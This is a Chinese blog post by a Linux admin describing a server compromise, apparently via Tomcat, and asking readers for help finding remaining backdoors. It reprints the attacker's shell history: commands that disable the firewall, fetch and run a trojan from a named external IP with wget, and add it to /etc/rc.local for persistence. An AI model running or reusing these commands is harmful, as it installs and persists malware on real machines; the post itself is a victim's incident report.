昨天公司一台服务器突然之间不能ping，ssh无法登陆，从IDC反馈说服务器往外发包，数量巨大，CPU状态显示200%。通过ps aux查看以下进程文件是异常文件：

./liun2.3
/tmp/liun2.3
/tmp/liun2.3h
zzta.pl

刚开始以为kill掉这些进程和删掉执行文件就可以了，可是过了几分钟，这个程序又继续执行。

那好吧，就去crontab -l 看有没有定时任务，没有。

more /etc/crontab 查看有没在这里定义定时任务。也没有

想了下，既然要执行文件，那么在.bash_history上是否由于记录呢？

cd
more .bash_history
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
killall java-2013
killall wins2
killall liun2.1
killall liun2.0
rm -f -r /etc/wins
rm -f -r /etc/java-2013
rm -f -r /etc/java-2013/java-2013
rm -f -r /etc/liun2.1/liun2.1
rm -f -r /etc/liun2.1
mkdir /etc/liun2.1
cd /../tmp
wget http://60.174.234.107:1974/liun2.3
chmod 0755 liun2.3
chmod 0755 ./liun2.3
./liun2.3
echo "cd /../tmp">>/etc/rc.local
echo "chmod 0755 liun2.3">>/etc/rc.local
echo "chmod 0755 ./liun2.3">>/etc/rc.local
echo "./liun2.3">>/etc/rc.local
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
killall java-2013
killall wins2
killall liun2.1
killall liun2.0
rm -f -r /etc/wins
rm -f -r /etc/java-2013
rm -f -r /etc/java-2013/java-2013
rm -f -r /etc/liun2.1/liun2.1
rm -f -r /etc/liun2.1
mkdir /etc/liun2.1
cd /../tmp
wget http://60.174.234.107:1974/liun2.3
chmod 0755 liun2.3
chmod 0755 ./liun2.3
./liun2.3
echo "cd /../tmp">>/etc/rc.local
echo "chmod 0755 liun2.3">>/etc/rc.local
echo "chmod 0755 ./liun2.3">>/etc/rc.local
echo "./liun2.3">>/etc/rc.local

 以上是在被入侵的操作。

 看到

wget http://60.174.234.107:1974/liun2.3

直接去下载木马程序。

进一步查找，在init.d目录下发现一个木马启动程序：DbSecuritySpt

并在rc1.d、rc2.d、rc3.d、rc4.d、rc5.d、rc6.d 建立了一个指向init.d目录下的DbSecuritySpt链接

在/usr/bin/下创建一个sgb可执行程序

最后在查找liun*这样的文件时，发现在tomcat/webapps目录下发现liun2.3、liun2.3h这样的文件。

初步认定是tomcat漏洞，就对tomcat进行安全检查，并禁用已被攻击的服务，修改一些端口号。

现在服务是继续跑着，可是后门是否还有后门程序？我的服务器是怎么被侵入攻击的？我一无所知，我是半路学习linux的，对于linux安全知识缺乏，写这篇博文的目的是想知道有没有朋友也遇到这样的攻击，这个网站上都是木马，http://60.174.234.107:1974，有高手看到这博文请帮忙怎么找出这个后门，或者被感染的文件。

本文出自 “胖子笔记” 博客，请务必保留此出处http://pangz.blog.51cto.com/1865802/1433461